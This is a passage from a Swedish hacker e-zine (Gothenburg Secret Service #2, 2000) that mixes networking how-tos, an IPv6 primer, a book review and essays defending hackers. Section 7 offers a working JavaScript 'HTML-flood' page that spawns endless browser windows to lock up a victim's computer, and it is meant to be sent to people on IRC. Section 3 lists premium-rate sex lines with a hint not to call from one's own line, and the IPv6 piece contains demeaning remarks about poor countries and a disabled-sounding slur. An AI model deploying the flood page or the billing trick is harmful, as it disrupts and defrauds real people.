OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
,$$$$$$$$$. ....' `üe. ....' `üe. ,$' `$ $ ,e' ,eeeee. `$. ,e' ,eeeee. `$. .$' ,eeeee. `$$ $',$$$$$$$$$. $ $',$$$$$$$$$. $ $',$$$$$$$$$.`$ $ $$$' `$$$ $ $ $$$' `$$$ $ .$,$$$',. `$$$. $$ $$$ $$$.`$$ $ $ $$$ $$$.`$$ $ ,$$$',$$$.`$$$' $ $$$ $$$.`$$ $ $ $$$ $$$.`$$ $ .$ $$$ $' `$ $$$ $' $$$.`$`$.`$ ' $ $$$.`$`$.`$ ' $ $$$ $. ,$ `$$ $ $ $$$.`$`$.`$ ' $ $$$.`$`$.`$ ' $ $$$ $$$$ý `$ $'$.`$$$.`$`$.` $ $.`$$$.`$`$.` $ $ $$$ $ý',ee. ` $'`$.`$$$.`$ `$$' `$.`$$$.`$ `$$' $ $$$ ',$$$$$$. $' $.`$$$.`$ $' `$.`$$$.`$ $' , $$$ $$$ $$$ $' `$.`$$$.`$ $' `$.`$$$.`$ $' $ $$$ $$$ $$$ $' .`$.`$$$.`$$' .`$.`$$$.`$$' $ $$$ `$$ $$$ $',$ü$`$.`$$$.`$' ,$ü$`$.`$$$.`$' $ $$$ $ `$ $$$ $ $ .`$`$.`$$$.` $ .`$`$.`$$$.` $$$$ `$.` $$$ $ $ $.`$`$.`$$$ $ $ $.`$`$.`$$$ $ .`$$$. ` ,e$$ $' $ $$.`ee$ $$$ . $ $$.`ee$ $$$ . $.`ü$$$$$$$$$'; $ $$$.`' ,$$$ $ $ $$$.`' ,$$$ $ $.$$$$$$$$$$$' $.`$$$$$$$$$' $ $.`$$$$$$$$$' $ $. `ýüüüý $`$. `ýüüüý' ,$' `$. `ýüüüý' ,$' `$$eeeeeee$$ .`$$eeeeeee$$' .`$$eeeeeee$$' . G O T H E N B U R G S E C R E T S E R V I C E #2 Nr. 002 2000-09-15 ////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ / 1. Ledare......................................Gotrex Gurnisson\ / 2. I-mode......................................Gotrex Gurnisson\ / 3. Pr0n nummer.................................Gotrex Gurnisson\ / 4. Introduktion till IPv6...............................hedback\ / 5. Bok reccension: Hacking Exposed.............Gotrex Gurnisson\ / 6. Uppsats: Vi hackare är inte olagliga........Gotrex Gurnisson\ / 7. Enkel html-flood.....................................Blazter\ / 8. IP-Masquerading under linux..........................hedback\ / 9. PPP i linux..........................................hedback\ /10. Internet Pirater, eller?.............................hedback\ /11. 2600seGBG...................................Gotrex Gurnisson\ /12. Faserna i ett IT-anfall..............................Zynta^x\ /13. Datorsystemets Penetreringsnivåer....................Zynta^x\ /14. Bra metoder för att förhinda dataintrång.............Zynta^x\ /15. Svenska h/p zines A till Ö..................Gotrex Gurnisson\ /16. Intervju med pewp ang. S&S artikeln.........Gotrex Gurnisson\ / + länkar \ ////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | Disclaimer | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ All information i den här tidningen är enbart teoretisk, den har aldrig utförts på något sätt och särkillt aldrig så att den bryter mot lagen. Skribenter i tidningen kan inte stå för svars för vad som har skrivits. Det är DU och enbart DU som står för svars för dina handlingar. ////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 1. Ledare Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Välkomna till nummer två av GSS. Efter vårt första nummer fick vi både bra och dålig kritik, som väntat. Och det är bra så att vi kan anpassa oss. Vi har haft 733 stycken besökare och det kanske skall påpekas och förhoppningsvis så har majoriteten läst zinet också :P Även så hade TheClown tagit sig tid och lagt upp oss på ThisGeneration. Nu finns tyvärr inte TG mer men ändå.. Där fick vi iallafall en hel del läsare. GSS har lagt upp en zines sektion på http://members.xoom.com/_XMCM/msadf/zines/ men tyvärr har jag bara begränsat med utrymme så jag fyllde det lilla vi hade ganska snabbt. Om nån har en webserver där vi kan ha våran sida så kontakta mig. Nu har det bestämts att man får sätta upp kameror i spårvagnarna i Göteborg (10st i varje vagn!) och VPS (Virtuell Parking System) som testas i Stockholm och skall även testas i Göteborg.. Vi väntar med spänning inför framtiden.. sedan har jag hållt på att åtminstonde försöka komma på telia refill koderna hur dom är upp- byggda etc Om nån har några eller vet nåt intressant så hör gärna av er. Även om ni vet nåt om de andra lokala sakerna så.. 2600 feber i Sverige med lokala möten lite varstans även i Göteborg där jag var. Läs 2600seGBG. Gotrex Gurnisson Email: Gotrex@antionline.org VMB: 031 7943192 URL: http://www.GothenburgSecretService.net ////////////////////////////////////////////////////////////////// \ \ / ...förresten, vad är ett nätverk? / \ - Bill Gates, 1984 \ / / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 2. I-Mode Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ I-Mode är Japans svar på WAP dvs interaktiva tjänster i mobil telefonen. Det är företaget NTT Docomo (Nippon Telegraph and Tele- phone Corporation) som redan har lyckats få 6 miljoner Japaner att ansluta sig till I-mode. NTT Docomo startade 1991 och I-mode lanserades 1999. Ordet Docomo betyder "överallt" på japanska. I-mode som betyder Interactive Mode, har förmodligen fått sitt namn av 'I' knappen som man lätt kommer ut på Internet med. I-modes funktioner är att man kan kolla hur mycket pengar man har på sitt kredit kort, köpa och sälja aktier, beställa böcker, skaffa försäkring, restaurang guide, recept, ordbok, tidtabeller, nyheter, väder och spel. Även email på 250 st tecken är möjligt. Skillnaden mot WAP (läs landers text om WAP) är att man surfar på en förenklad version av html deras CWML (Compact Wireless Markup Language). Internets html istället som WAP ett helt eget (Internet). Man betalar för hur mycket data som man tankar ner eller rättare sagt tar emot. I dags läget är det 9,6kbps men max hastigheten är 2mbps. I-mode klarar även av grafik och enklare animationer. Som dagens WAP inte klarar av ännu. |_ <--> Docomo Packet Network <--Internet--> ISP | | Imode Server <--Leased circuit--> ISP |_| <--> Voice Network En liten detalj är att det 11 siffriga (Japanska nummer) telefon- nummrerna fungerar som email adress t.ex 0908382XXXX@docomo.ne.jp. Telefoner som stöder I-mode: P501i HYPER Ericsson ER207 Nokia NM502i ////////////////////////////////////////////////////////////////// \ \ / "Det finns ingen väg till lyckan, vägen är lyckan." / \ - Buddha \ / / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 3. pr0n nummer Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ OBS! ALLA DESSA NUMMER KOSTAR TYP 19,95KR PER MINUT RING INTE FRÅN EGET ABBONEMANG OBS! 071757575 071215263 071696969 071666999 071612054 071610012 071610013 071612059 071612047 071612051 071612046 071612047 071612048 071612049 071215263 072411111 072787878 0727854445 086670742 087480118 0850302000 \ 0850308000 )- Klassiska Heta Linjen 0850301900 / 0406808083 0406406699 0406406699 0406406601 0406406602 0406406603 0406406604 0406406605 0406406606 0406406607 0406406608 0406406609 0406406610 0406808081 0406807865 0406807866 0406807879 00916644105177 0096836479 0096838399 0096836378 09441060000 09441166664 09441166662 OBS! ALLA DESSA NUMMER KOSTAR TYP 19,95KR PER MINUT RING INTE FRÅN EGET ABBONEMANG OBS! ////////////////////////////////////////////////////////////////// \ We can manipulate you however we want. \ / We can read and change your Personal datas. / \ We can take your identity. \ / Kill your existance. / \ We can come near to you from everywhere in the world. \ / You can´t escape! / \ - UHA \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 4. Introduktion till IPv6 hedback| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Man tror att dom tillgängliga ip-adresserna i världen kommer att ta slut ca år 2005... och när ip-adresserna tar slut så betyder det helt enkelt att det inte går att ansluta något, som behöver en ip, till internet. Eftersom våra äldre bröder är så pass smarta, så har man sedan slutet på 1991 börjat utveckla ett nytt sätt som ska klara av att skapa mer ip-adresser i ett nätverk. Denna nya standard ska då kunna klara av att dela ut 3,40 x 10^38 adresser. Detta är betydligt mer än dagens IPv4, som man uppskattar ska klara av att dela ut ca 4 x 10^12 adresser. Varför nu detta? Räcker inte fyra miljarder ip-adresser till när vi är färre människor än så på jorden? Nej, det gör inte det. Man kan ju förvisso bortse från alla U- länder, för jag kan inte tänka mig att människor som inte har mat för dagen sitter med en dator, eller? Vidare kan man räkna bort alla infödingar i Afrika, folk över 120(?), och min mongo granne i trapphuset brevid. Iaf, detta beror på att utdelningen av dessa ip-adresser inte fungerar nå vidare. Det händer (och fötter) att stora företag som behöver max 1000 ip-adresser får närmare 30 000, beroende vilket sorts nät dom använder. Då är det en 29 000 adresser som inte användes, men blir oanvändbara ändå. Det nya systemet, IPv6, gör så att man inte behöver spara på adresserna... Inte för att dom sparar på dom nu, men ändå. Det nya med IPv6 [Ed.'s note: eller IPng, ng för Next Generation] är inte enbart att man får hur jävla många miljarder ip-adresser som helst, utan man har även lagt till nya saker såsom säkerhets funktioner och prioritetsfunktioner. Dessa två nya funktioner tänker jag inte gå in mer på i denna enkla introduktions txt. Det finns tre olika sätt att skriva adresserna som txtsträngar. Det första sättet är att skriva ut hela adressen i hexadecimala värden, vilket inte är nått större problem. (enkelt att komma ihåg oxå). Ex: XXXX:1X1X:111X:111:XXXX:11:1111:1X11 Andra sättet är komprimerad och inga nollvärden tas med. Ex: XX11::111X:11 (dubbla kolon betyder att allt mellan dessa är nollor). Tredje sättet är ifall man måste ha med en IPv4 adress. Ex:1:1:1:1:1:1:199.161.122.165 IPv6 ligger än så länge på ett försöksstadium, och om man vill testa kan man smurfa till url'en www.6bone.net som är ett nätverk öppet för dom som vill testa den nya standarden. Finns lite annat där oxå, som rör IPv6... t ex vilka länder som är med och utvecklar mm. Har du linux, som alla elite ppl har, så är det bara att fixa en IPv6 adress. Men om du är trogen Windows user så får du vänta en stund tills Micro$oft släpper dom tilläggen som du behöver för att kunna nyttja IPv6. Till NT så vet jag att dom håller på och utvecklar... Men har ingen aning om det oxå kommer att finnas till vanliga och tråkiga Win9.X. Nästa steg efter 128 blir väll 256 bits ip-adresser osv. Jaja, den som lever får se brukar man ju säga... Texten presenteras i samarbete med Team DreamVizion. ////////////////////////////////////////////////////////////////// \ "If I have seen further, it is because \ / I have been standing on the shoulders / \ of giants" \ / - Isaac Newton / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 5. H a c k i n g E x p o s e d Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Mycket bra bok som beskriver hur man går till väga när man lär sig om olika operativ system och hur man undgår säkerheten och givetivis hackar. Även en del telefon trixs finns med som war dialing m.m Boken är indelad i olika kapitel och sedan står det steg för steg hur man skall gå tillväga. De olika kapitlerna är: I Cashing the establishment: Footprinting, Scanning, Enumeration II System Hacking: Hacking Win95/98, Hacking Win NT, Novell Netware Hacking, Unix III Network Hacking: Dial-up and VPN hacking, Network Devices, Firewalls, Denial of Service Attacks IV Software Hacking: Remote Control Insecurities, Advanced Techniques, Web hacking Minus för att hemsidans länkar inte är uppdaterade. Tycker att det borde föjlt med en CD-ROM med alla programmen. Och jag tycker också att det är lite väl mycket genomgång av olika "kokboks program" dvs program som gör allt åt en. Sammanfattningsvis så är det faktiskt en bra bok som både nybörjaren och den mest erfarne kan läsa. Hacking Exposed av George Kurtz, Stuart McClure och Joel Scambray finns att köpa på www.bokus.se eller www.amazon.com Kostar runt 400-500kr. Betyg: MVG- http://www.hackingexposed.com ////////////////////////////////////////////////////////////////// / Make my word a crime, I will cry out louder \ \ Silence my voice, I will find another / / Make my voice a crime, I will create a new one \ \ Hunt me down, I will find a new place to hide / / Lock me away, Ten will rise to take my place \ \ You cannot silence me, You cannot stop me, I and my / / kind are forever \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 6. Uppsats: Vi hackare är inte olagliga Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ På senaste tiden har "hackers" och enligt min mening förfulat "hackare" fått skulden för i olika medier för att vara brotts- lingar och ligister. Detta är den allmänna uppfattningen som man kommer fram till när man hör och läser om "hackare" i tidningar. Dessa relativt okända individer beskrivs vara ligister som förstör bankomater, telefon boxar och manipulerar hemsidor och dessa "hackers" jämförs med andra brottslingar. Ofta hamnar sådana incidenter på löpsedlarna med stor tyngd på att det skulle varit en dator "hackare" i farten igen. Även i personer som t.ex. hackat sig in hos NASA dömts till dagsböter. I Sverige finns det en lag på max straff på två år men än så länge har inte fängelsestraff delats ut för den här typen av brott. I USA däremot så är straffen däremot betydligt strängare, upp till 60 år. Kan det vara så att ni missbedömt dessa personer ni inte vet någonting om? Jag anser bestämt att så är fallet. Massmedia förmedlar en av bild "hackare" som inte stämmer överens med sanningen. En "hackares" mål är inte att förstöra, om vi tittar på en hackares s.k. budord, regler: "informationen skall vara fri" dvs. totalt obegränsad. Med detta menas att alla har rätt att bruka datorer och att informationen skall vara helt fri. Information kan vara t.ex. innehållet på Internet. Också program skall vara fritt till- gängligt för alla. Det är därför vi ser en uppåt gående trend av "freeware", program som är helt kostnad fria och "open source" dvs. källkoden är tillgänglig för alla. En "hackare" bedömer inte andra utifrån ålder, ras eller position i samhället utan istället beroende på hur duktigt han eller hon är. Ingenting eller någon skall komma till skada när hackare använder sina kunskaper. Detta är inte en galen brottsling som följer sådana här ädla lagar. Nej detta är enligt myten en duktig tonåring vars förmåga att hantera överstiger de flesta. Om sanningen skall fram så finns det "hackare" i alla åldrar, länder, samhällsklasser och arbeten. Vaddå kanske ni tänker, han som förstör måste väl i vilket fall stå till förvars? Ja personer som förstör saker skall dömas därefter men skulden skall inte ligga på data hackers vara sig det har med teknik eller något annat att göra. De som förstör är ligister, sabotörer, fifflare eller terrorister beroende på vad brottet är. Nu över till de riktiga "hackarna" som tar sig in i datasystem och ändrar en fil och skriver ut ett lustigt meddelande på skrivarna, tjuvkikar och samtidigt påvisar den bristande säker- heten. Är dessa brottslingar som begår olagliga handlingar? I min mening är de snarare välgörare mer än tjuvar. På många företag finns inte någon säkerhet och på ställen där den borde vara superb är den endast minimal. Ta istället och anställ någon som verkligen kan något t.ex. tidigare hackare. Många av dessa tidigare kallade brottslingar får i början betala böter och/eller skadestånd. Efter detta så belönas de med väl betalda IT jobb. Tre konkreta exempel som är värda att nämnas är Jon Johansen, den dåvarande sextonåriga norrmannen som "knäckte" DVD-skyddet vilket hindrar en från att kopiera filmerna (skivorna) har fått jobb på spel utvecklings företaget WAP factory. Den nästan legend förklarade Kevin Mitnick som suttit fem år i fängelse har fått erbjudande att bli säkerhets rådgivare åt senaten och de två svenskar som anklagas för att ha brutit sin in hos NASA, hör och häpna, fick jobb erbjudande innan ens rättegången hade börjat. Är dessa personer våra värsta fiender som vi så snällt på detta rimliga sätt behandlar. Vi bör istället värna om våra unga, duktiga hackare som ser till att säkerheten ökar och att säkerheten tas på allvar. Två väldigt viktiga aspekter i början av 2000-talet, IT ålderns guld ålder? För ett år sedan lite drygt så sänktes de största hemsidorna på Internet bland annat CNN.com och yahoo.com av åtskilliga så kallade "Denial Of Service". Detta bevisar att om de bästa och största sidorna på Internet kan 'stängas ner' så är resten av Internet sårbart också. Jag tycker detta var positivt snarare än negativt eftersom även här får vi upp ögonen för att säkerheten brister och priset för detta var endast att sidorna inte blev tillgängliga under en viss tid. Nu i samband med att det svenska bredbands nätet byggs ut kommer allt fler behöva ta sig en funderare om ni, var och en är säkra. Är Windows så säkert som Microsoft fått er att tro? Skulle inte tro det. Är hackare din värsta fiende eller din bästa vän? Det senare är mitt och förhoppningsvis ert blivande intryck. ////////////////////////////////////////////////////////////////// \ \ / "If you build it we will hack" / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 7. Enkel html-flood Blazter| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Jag har gjort en liten HTML-flood, den är jävligt simpel, men extremt effektiv och smidig. Skicka bara över urlen till t ex nån som håller på och floodar på IRC och......borta! Det tog mindre än en minut att låsa min P2 400 MHz med 128 mb ram! Den skulle kunna göras effektivare, men det behövs inte... sen är det bra att om man är snabb kan killa browsern.... det klarar ju ändå inte en lamer.... och använd bara det här tricket mot folk som tigger om det. /* -------------------- html-flood.html ----------------------- */ <HTML> <HEAD> <TITLE>DIE!</TITLE> <SCRIPT LANGUAGE="JavaScript"> total=0; function kill() { i=0; while(i < 1) { window.open("http://www.hotmale.com"); } } </SCRIPT> <script language="javascript"> if (document.layers || document.all) { a=1; setInterval("Jump()",10); } function Jump() { a=a+.1; self.moveBy((Math.random()*a*200 -a),(Math.random()*a*200)-a); } </script> </HEAD> <BODY onload="kill()" BGCOLOR="000000" TEXT="00FF00"> <h1>Congrationlations you will now have the honour to be killed by Blazter of DreamVizion!<br> Moahahahahahahahaha! =P </BODY> </HTML> /* ------------------------ EOF ------------------------------- */ Texten presenteras i samarbete med Team DreamVizion. ////////////////////////////////////////////////////////////////// \ \ / "Den som inte känner till vad som hände innan / \ han föddes förblir ett barn" \ / - Kiko (Romersk talare) / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 8. IP-Masquerading under linux hedback| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Denna text kommer att ta upp vad IP-Masquerading, eller som det heter på svenska, IP-Maskering är och hur du konfigurerar det. Jag kommer att använda mina inställningar, som fungerar för mig, som exempel. Det är därför inte säkert att du lyckas få till det på din burk med samma inställningar. Grundkraven som denna txt förutsätter att du uppfyller är ett fungerande nätverk och en linuxdator med Internetuppkoppling. Det som IP-maskeringen gör är att om du har flera datorer i ett nätverk, men endast en av dessa med internetuppkoppling, så kan du få alla datorer att dela på samma. Vilket kan vara väldigt praktiskt. Nå, hur funkar då detta? Vi tar ett exempel. Om du är ute och surfar, och så vill du till http://www.av.com då så skickas en signal ifrån din dator (via linuxburken) till den dator som du vill komma till. När detta paket passerar linuxburken med internetuppkopplingen så skriver den om början på paketet så att www.av.com tror att paketet kommer direkt ifrån linuxburken. Sen så svarar servern, och huvudet på paketet skrivs om igen av linux, och skickar det vidare till den datorn man sitter vid, som då tror att den fick svaret direkt från servern osv. Hänger du med? Hur konfigurerar man IP-maskeringen? Först så ska du titta efter ifall filen /proc/net/ip_masquerade finns. Om den inte finns så måste du kompilera om din kärna med stöd för detta. Men eftersom dom flesta oftast har stöd för detta från början så få det bli en annan txt. Ok. Då fortsätter vi. Först så måste du säga åt linux att den ska skicka vidare paket vilket görs med kommandot: # echo "1" >/proc/sys/net/ipv4/ip_forward Sen så ska du använda ipchains för att tala om vilka ip-nummer som ska maskeras och inte. Jag använder klass C serien, dvs 192.168.0.1 -> 192.168.255.254. Jag använder följande kommandon: (Tänk på att du måste ha ipchains installerat...) #ipchains -P forward DENY Detta gör att datorn inte skickar någonting vidare som inte matchar andra regler. #ipchains -A forward -j MASQ -s 192.168.0.0/24 -d 0/0 Detta talar om för datorn att den ska maskera allt från 192.168.0.0/24 till alla andra destinationer. 192.168.0.0/24 talar om alla datorer med ett ip-nummer som börjar på 192.168.0.0 med netmask 255.255.255.0 Då är konfigurationen på linuxburken klar. Nästa steg är att konfigurera dom andra datorerna i ditt nätverk att använda linuxburken som standard gateway. I linux så görs det med kommandot: # route add default gw I Win så görs det via Kontrollpanelen -> Nätverk eller ett högerklick på Nätverks ikonen på skrivbordet. Klicka fram dig till inställningarna för TCP/IP och lägg till IP-nummret för standard gateway under Gateway, dvs linuxburkens ip-nummer. Sen så måste du skriva in ip-adresserna till DNS'erna hos din isp under DNS-konfigurationen (vanligtvis 10.0.0.1/2). Nu så är det klart. Starta om Windows och testa att smurfa. Några få inställningar kan behövas göra med din webläsare & e-post progg osv. Linuxburken behöver du inte starta om. Good Luck! Texten presenteras i samarbete med Team DreamVizion. ////////////////////////////////////////////////////////////////// \ \ / "Security is a process, not a product." / \ - Bruce Schneier \ / / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 9. PPP i linux hedback| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ För att ansluta till internet via modem så används protokollet PPP i linux. Om din isp stöder PAP (Password Authentication Protocol) vilket nästan alla gör idag, så är det inga problem. Om den däremot inte gör det så får man pilla lite mer innan allt funkar som det ska. Först så måste du ansluta och starta modemet om inte det redan är gjort. När det är gjort så måste du tala om för linux vilken com port som modemet är kopplad till. Det gör du genom att skapa en symbolisk länk /dev/modem till den fil i /dev som motsvarar porten modemet är ansluten till. DOS namn: linux namn: (äldre kärna) COM1 /dev/ttyS0 /dev/cua0 COM2 /dev/ttyS1 /dev/cua1 COM3 /dev/ttyS2 /dev/cua2 COM4 /dev/ttyS3 /dev/cua3 Om ditt modem sitter som mitt på COM1 skriver du: # cd /dev # ln -s ttyS1 modem - Med PAP - Starta linuxconf och välj Config -> Networking -> Client tasks -> PPP/SLIP/PLIP. Välj sedan Add. Markera PPP och tryck Accept. Då skickas du vidare till nästa skärm där du ska ange användarnamn, lösenord, telefonnumret till modempolen, modemporten och att du vill använda PAP. Tryck Accept. Nu tillbaka till linuxconf där du ska välja "Name server specification (DNS)" för att ange dina DNS servrar. Vanligtvis så har dom IP-adresserna 10.0.0.1 och 10.0.0.2. Men du kan alltid fråga din isp om detta. DNS Algonet Primär: 194.213.74.1 Algonet Sekundär: 194.213.64.33 LibertySurf Primär 212.139.0.3 LibertySurf Sekundär 212.139.0.2 NetLink Primär: 212.242.40.3 NetLink Sekundär: 212.242.40.51 SBBS2 Primär: 212.112.0.10 SBBS2 Sekundär: 212.112.0.11 Tele2/SwIPNet Primär: 192.71.220.10 Tele2/SwIPNet Sekundär: 130.244.127.161 Telenordia Primär: 194.213.72.4 Telenordia Sekundär: 194.213.72.11 Telia Primär: 131.115.15.7 Telia Sekundär: 131.115.115.50 Utfors Primär: 130.239.8.10 Utfors Sekundär: 195.58.103.18 Sunet har en bra DNS som du kan använda i annat fall: Sunet Primär: 192.36.125.2 Sunet Sekundär: 192.36.144.17 (tack till ecco@lugu.org för DNS listan) Nu så kan du prova om det fungerar med programmet ifup via promten. Om din förbindelse heter PPP0 skriver du: # ifup ppp0 Modemet ringer nu upp och försöker ansluta. När modemet tystnat och lamporna lugnat ner sig så kan du prova att pinga/surfa och kolla så att det funkar. För att koppla ner skriver du: # ifdown ppp0 Man kan behöva att koppla upp/ner några gånger innan det fungerar riktigt. - Utan PAP - Om din isp inte stöder PAP så måste man ta reda på vilka strängar som används vid inloggning. Det görs enklast med programmet minicom. # minicom Ctrl + A och sedan Z poppar upp en meny över olika kommandon. Välj D för att komma in i "Dialing Directory" och lägg till tel. nummret till din isp. När du är klar, välj "Dial". När du är uppkopplad så kan det hända två olika saker. Du får upp en inloggningspromt eller så kör PPP igång. Om PPP kör igång så stöder isp'n PAP och inge mer med det. Om du får en loginprompt så loggar du in och noterar hur servern frågar efter loginnamn och lösenord. När du loggat in och kommer till en prompt, så testa att starta PPP på servern genom att skriva: > ppp PPP-förbindelsen avslutas med "++++" och du kopplar ner dig med Ctrl + A och X Nu så ska vi göra några inställningar för anslutningen. Starta linuxconf och välj PPP/SLIP/PLIP. Välj ppp0. Under Communication ska du fylla i dom textsträngar som du såg i minicom Om servern frågar efter Username: så fyller du alltså i det i första fösta fältet "Expect". Fyll inte i början av ordet eftersom modemkommunikationen inte hinner lyssna av hela ordet. Så istället för "username:" skriv "sername:", "login:" blir "ogin:". När allt är ifyllt och klart, välj Accept. Sen när du vill ansluta så använd ifup och ifdown för att koppla ner. Det som jag gått igenom här är ett av många sätt att fixa en PPP- anslutning i linux. Jag påstår inte att det är det bästa sättet, men det funkar... och det borde vara det viktigaste. Texten presenteras i samarbete med Team DreamVizion. ////////////////////////////////////////////////////////////////// \ \ / "Free speech is for everyone" / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | 10. Internet Pirater, eller? hedback| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Vem har missat den senaste tidens datavirus som "I love you", Melissa och diverse varianter. Dessa virus var script som drabbade användare av Outlook (i första hand). Sen så har vi bråket mellan RIAA och Napster. Napster som har ökat i användar antal med 480%(!) sedan dom blev stämda. Ganska bra reklam att bli stämd med andra ord. Vidare har vi piratkopieringshärvor, carding osv. Brottsligheten på intenet ökar kraftigt, men exakt hur mycket vet man inte, men det som tveklöst ökar mest är bedrägerier, förtal, handel med stöldgos och brott mot upphovs- rätten. Olaglig kopiering av musik och dator program är de upphovsrättsbrott som ökat mest. Dessa sk brott begås till största delen av "tjuvar" och vanliga användare. Ofta i press så drar man alla över en kamm. Det är en evig karusell med "hacker stjäl bla bla" och "hacker tog sig in i bla bla". Sen så kan man läsa i nån b-tidning att "Hackare är ofta snälla datornördar". Ordet hacker har fått en viss nörd status, dels för att ordet används i fel sammanhang och dels för att alla snorungar som kan mailbomba nån kallar sig för nått som "3vil hxxor". För att inte tala om alla som ska göra sig smarta och förklara vad ordet egentlingen betyder. [sånna som jag =P] I en artikel för ett tag sedan så kunde man läsa om vad dom olika orden, som t ex hacker, cracker och phreaker betyder. Författaren till artikeln heter Hans Nilsson men vi kallar honom för Hasse. -=- Lär dig skilja hackers från crackers! Hackers är ganska oskyldiga (sv hackare) En hackare är en person som vill lära sig så mycket som möjligt om datorer, program och nätverk, i motsats till en >>normal<< an- vändare som helst vill veta så lite som möjligt om sin dator, program och uppkoppling. Det brukar även vara så att utforska brister och dolda funktioner i datorsystem för att få nyttja dessa för egen vinning eller för själva kunskapens egen skull. Enligt New Hackers Dictionary, andra utgåvan [obs! andra utgåvan :P//hedback], kommer ordet hacker från ett gammalt engelskt ord för möbelsnickare. Crackers gillar att förstöra (sv krackare) En person som uppvisar de flesta egenskaper man brukar tillskriva hackare, med den skillnaden att krackare inte drar sig för att elektroniskt bryta sig in i andras värddatorer, nätverk och datorsystem, eller blockerar åtkomsten till dessa. De värsta avarterna förstör även de system som de tagit kontroll över. Krackare förändrar även innehållet på hemsidor efter att de olovligen skaffat sig tillgång till en webbserver. Script-kiddies - unga och oförsående Ofta påfallande unga användare som kallar sig hackers, men som i allt väsentligt saknar avancerade kunskaper om nätverk och programmering. De använder sig istället av färdiga program som andra, mer erfarna hackers, tillverkat. Ofta sker detta utan att Script-kiddies vet vad programmen utför och varför, vilket kan leda till omfattande elektronisk skadegörelse. Phreakers gillar telenätet Personer som hyser samma fascination inför telefonnätverk som hackare känner inför datornätverk. Phreaking räknas av många som ursprunget för hacking. Numera har dessa två subkulturer i det närmaste vuxit ihop eftersom telefonnätverken är datoriserade och eftersom internet ofta körs över vanliga telefonlinjer. En phreaker kan till exempel bryta sig in i ett telefonskåp i källaren på ett hus och koppla in sig på någon annans telefon- abonnemang. Hemliga Cyberpunks (sv chifferpunkare) Dessa förvarar passionerat rätten att få vara anonyma på nätet samt ser det som en gundläggande rättighet att få skicka elektroniska meddelande som inte går att avlyssna (avkoda) av tredje part, till exempel myndigheter. Ligger ofta två steg före nationell lagstiftning och exportlagar angående fri spridning av stark kryptering Spammers e-postbombar (sv spammare) Kommersiella aktörer som nyttjar företags- och organisationers e-post servrar för att göra olagliga massutskick till e-post- adresser. För det mesta rör det sig om kedjebrevsliknande reklam, men även extremistisk politisk propaganda har förekommit. Avskydda av alla andra subkulturer. Pirates spider program (sv pirater) Personer som tar bort kopieringsskyddet på kommersiella dator- program eller de som kopierar, sprider och/eller säljer dator- program olagligt. Det finns även en uppsjö begrepp för roller inom piratkulturen; traders/swappers (byter program med varandra) och så vidare. Coders - en egen livsstil (sv kodare) Helt enkelt personer som har skapandet av datorprogram (och program) som livsstil. Virus-coders skapar problem (sv viruskodare) Personer med talang och kunskaper för att tillverka själv- replikerande datorprogram med ofarliga eller destruktiva egen- 